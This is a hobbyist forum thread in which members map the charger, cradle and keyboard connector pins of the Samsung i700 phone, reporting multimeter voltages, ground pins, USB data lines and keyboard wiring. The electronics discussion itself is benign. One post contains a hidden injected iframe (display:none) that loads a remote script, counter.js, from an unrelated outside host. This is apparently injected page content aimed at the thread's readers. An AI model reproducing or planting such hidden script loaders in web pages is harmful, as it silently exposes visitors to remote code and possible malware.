+ Reply to Thread
Page 1 of 2 1 2 LastLast

That pinout thread

There's been a bit of talk about the pinouts of the i700, its charger cable, and its cradle. Some observations are below, the measurements are from a Fluke DMM, not a scope.

1. The charger jack has 5 pins, the cradle has 16. Both devices can charge the phone and use the same pins to do so, minus one quirk. The charger has two pins to the far left outside the attaching clip, while the cradle has only one. By blocking contact of the outermost pin on the charger with the phone, the phone still displays a charging popup balloon. I suspect this pin is a feedback to the travel charger that it uses to switch to trickle. The first pin is ignored inside the cradle, it terminates at the socket on the cradle's circuit board. Blocking any individual pin in pins 2-5 causes no charging popup to appear.

2. Charger pin 2 produces 0V.

3. Charger pin 3, cradle pin 2, the tall pin to the right of the attach clip, is ground.

4. Charger pin 4 produces 270mV. When the charger is plugged into the cradle, cradle pin 3 (the same pin, due to the omitted leftmost pin) rises to 800mV. Trickle charge pin? Internal battery charge pin?

5. The same happens with the "Beef Pin", charger5/cradle4. Detached, the charger pin produces 5.2v. Attached, 4.8. Neither matches the cradle's rated 4.2 output, but this is clearly the fast charge pin.

6. Cradle pin 5 is unknown for now. However, since I can very easily get a misaligned i700 in my cradle to cause the external keyboard popup to appear on the i700 screen, I think the pin is dead in the cradle but the i700 looks there for a keyboard signal and gets pin 6's output if I dock crooked. The cradle pin produces no voltage and shows infinite resistance to ground. It's dead, Jim.

7. Pin 6 is USB Data +.

8. Pin 7 is USB Data -.

9. Pin 8 is USB 5V. Those three were easy.

10. The remaining pins on the cradle are dead. By opening the cradle, I saw that only 8 wires connect to the phone jack. Pins 9-16 are for Some Other Purpose (hmmm, you sure could fit rs-232 in there...)

11. According to other members, the i300 and i500 charging cables work on i700s.

...Some chowder for those with a concept of electronics to chew on.
    -s

BB Storm on Alltel network MyPDAphone's Avatar
    Nice thread Sleeve

I wish like mad I had a keyboard so I could try and see what pins are hooked to it, and then try doing some serial connectivity over those pins through a hacked off cable.

Anybody got a keyboard, or an i300 serial cable they want to donate to a good cause?

Thanks,
    Shawn

P.S. Hopefully this is all in vain...I have heard from credible sources that someone is working on a serial cable for the i700 as we type. Maybe they will have the foresight to include the ability to make it a Y adapter type solution so we can plug a charging cable in to it at the same time.

Shawn

Since ya just gotta love being able to return stuff you buy at a retail store, I grabbed the Samsung i330/i500 keyboard recently found at CompUSA. I knew the driver disk would be useless, but I figured I'd try the basic keyboard since a few times when I've docked into the cradle a little crooked, a popup has appeared for the external keyboard. Well, no luck, it's going back.

The connectors are exactly the same, but the i700 doesn't like the keyboard. For those who have asked for a picture of the keyboard cable, this cable had all 19 possible pins present. This seemed to scream, "no, you will not make a third party keyboard."

The build quality of the keyboard surprised me and led me to register at Samsung's site and order the real i700 product. I'll update the pinout thread once I get the keyboard.
    -s

Well, I picked up an i300 serial cable at CompUSA today. That's the good news....

Bad news...on the DB9 connector side, pin 5 is the ONLY pin I got any continuity to the phone plug side. Pin 5 on the DB9 has continuity to pins 3 and 17 (the pins that stick up higher than the rest in the middle of the connector) and also ground (outer shell of connectors.)

No other pins were connected to the other side directly...
    I opened up the part in the middle and found 2 microprocessors, multiple capacitors, and one resistor...I'm sure some of this has to do with the charging circuit, but the cable pins most definitely pass through one if not both of the microprocessors.

Here is one pic:

More pics are here:
    http://www.ayresweb.com/i700/i300_cable_pics/

What does this mean? Maybe nothing since it's a cable for the i300.

Shawn

Phone 3, phone 17, and db9 5 are all ground, and that's good. Download and install ZTerm PPC and open a direct serial connection with the cable attached. Pin 4 should raise DTR and show a voltage if the i700 has active serial. If not, you'll need to be a little more persistent with ZTerm before giving up.

You may also want to look for resistance other than infinite between ground and pins 6, 10-16, and 18-19. Directly off the phone, without running a terminal emulator, ground to 18 and 19 show 16.5 and 47.3 kohm respectively. The interesting pin is 16. Shorting it to ground makes it jump around in the low 40kohm range without holding still, as if it might be negotiating or pulsing. Pin 15 produces 2.85V. It seems like the high end pins continue to have potential as an interface powered by the phone.
    -s

Well....

I get the same voltages with the i300 cable plugged to the i700, regardless of whether I'm running zTerm or not.

On pin 1 I get a (neg) -5.37V, pin 2 = (neg) -5.37, pin 6 = (pos) 5.41, pin 8 = (neg) - 5.37, and pin 9 = (neg) - 5.37

All other pins are "zero" volts.

Shawn

Where's the juice coming from, the phone, or is that an edge connector for the i700 travel charger that connects to one side of the serial cable?
    -s

Those readings are on the DB9 connector.

Shawn

Right, I knew you meant the DB9, but I'm asking for the bigger picture. You zoomed in a little too much to make things obvious. When you test the db9 pins, is the travel charger attached to that edge connector? Sorry if that's obvious to you, but I'm looking at trees, not forest.
    -s

Sorry man...

Actually those voltages are both with AND without the charger plugged in to the cable. Kinda crazy, but that's the way it is. There is absolutely no difference.

Shawn

Does the phone appear to be charging when rigged that way?
    -s

No, it only appears to/starts charging after the charger is plugged in to the cable.

More tinkering. I've taken the travel charger's phone end connector apart so I can get readings while the phone is connected, and the resulting readings pretty much nullify anything said prior about the first five pins. These are the new voltages with the travel charger connected to the i700:

1 cycling 2.20 to 2.26
    2 1.791
    3 0
    4 ~4.2
    5 2.76

So pin 1 seems to be behaving like a feedback to the charger to switch from fast to trickle charge. I'm going to test it again once I have a full charge. It has a very regular pattern to it, while the others hold solid.

Unlike I said before, pin 5 is not the 4.2v fast charge pin, rather it's pin 4.
    -s

Originally posted by Sleeve
    More tinkering. I've taken the travel charger's phone end connector apart so I can get readings while the phone is connected, and the resulting readings pretty much nullify anything said prior about the first five pins. These are the new voltages with the travel charger connected to the i700:

1 cycling 2.20 to 2.26
    2 1.791
    3 0
    4 ~4.2
    5 2.76

So pin 1 seems to be behaving like a feedback to the charger to switch from fast to trickle charge. I'm going to test it again once I have a full charge. It has a very regular pattern to it, while the others hold solid.

Unlike I said before, pin 5 is not the 4.2v fast charge pin, rather it's pin 4.
    Would you be able to post some pictures of the inside of the connector? Did you take apart the end with the electronics? Any pictures you post will help some of the third party companies figure out what is needed to add power to their cables, like GPS cables.

Thanks.
    Rob.
    www.mobilerob.com
    Productivity software for Smartphones

Rob,

Do they want to suck power down from the phone's supply or allow the travel charger to be attached to their cable? I've got a set of numbers for pin voltages shorted to ground directly off the standalone phone's socket that I can post.

I can take pictures of the opened phone end of the travel charger, but until I have a source to order another charger, I'm not going to disassemble and test the AC side of the charger.

Anyone hoping to market a cable reliant on the i700 travel charger should really buy their own copy of the cable and test it with something more stable than a Fluke DMM. I'm no EE, and I'm not going to be able to accurately communicate what the pins are doing beyond continuity and approximate voltages shorted to ground.

I'm sort of focused on the keyboard at the moment, since PPC Techs and Boxwave already have more information than I can provide on the charging side. I'd need a scope to get a real understanding of the first pin since it appears to be following a waveform.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    -s

Originally posted by Sleeve
    Rob,

Do they want to suck power down from the phone's supply or allow the travel charger to be attached to their cable? I've got a set of numbers for pin voltages shorted to ground directly off the standalone phone's socket that I can post.

I can take pictures of the opened phone end of the travel charger, but until I have a source to order another charger, I'm not going to disassemble and test the AC side of the charger.

Anyone hoping to market a cable reliant on the i700 travel charger should really buy their own copy of the cable and test it with something more stable than a Fluke DMM. I'm no EE, and I'm not going to be able to accurately communicate what the pins are doing beyond continuity and approximate voltages shorted to ground.

I'm sort of focused on the keyboard at the moment, since PPC Techs and Boxwave already have more information than I can provide on the charging side. I'd need a scope to get a real understanding of the first pin since it appears to be following a waveform.
    I certainly understand. When I read travel charger, I confused it with the car charger, which is the cable that GPS companies need to understand to provide power to the i700 while connecting to the port connector for the GPS signal. I really appreciate what you have done so far with the keyboard and power pinouts.

Rob.
    www.mobilerob.com
    Productivity software for Smartphones

When using an i300 car charger, the i700 does not pop up a charging balloon, but BatteryPack does report that the battery is charging.

The car charger's five pins show these voltages:

1 5.85
    2 3.28
    3 0
    4 4.2
    5 1.45 - 1.5 cycling

The car charger also went to trickle charge much faster than it should have. As a result, and based on these voltages, the i300 car charger is not an acceptable substitute for the i700 car charger.
    -s

OK, here are the i700's keyboard pics. Please note that the i330/i500 keyboard is pinned exactly identical to the i700/i600 keyboard except it lacks the 45kohm resisttor across the ground pins on 3 and 17, 17 provides no ground on the 330/500.

This first picture shows the three wires labeled TX, VDD, and GND connected to the circuit board on the keyboard end.
    Attached Thumbnails Attached Thumbnails That pinout thread-dsc00238.jpg  
    -s

Here is a shot of the i700 end of the keyboard cable. While all the pins are present in the connector end, only four pins have continuity.

3 is ground direct to the keyboard.
    17 is ground passed through a 45k resistor to ground on 3 and connected to the clear/black wire.
    4 is the red wire that maps back to VDD on the keyboard.
    16 is the green wire which maps to TX on the keyboard and might possibly be rs-232 TX.
    Attached Thumbnails Attached Thumbnails That pinout thread-dsc00239.jpg  
    -s

Here are the chips on the board inside the keyboard. The one marked 4.00M is the exact same chip that appears in a Tigerex thumbboard I'm trying to hack into my i700. The FXKB01 is probably a CMOS keyboard BIOS. The Tigerex uses an ass-u-med similar PIC chip that is in the Chipdir database, but the FXKB01 does not appear in chipdir.
    Attached Thumbnails Attached Thumbnails That pinout thread-dsc00237.jpg  
    -s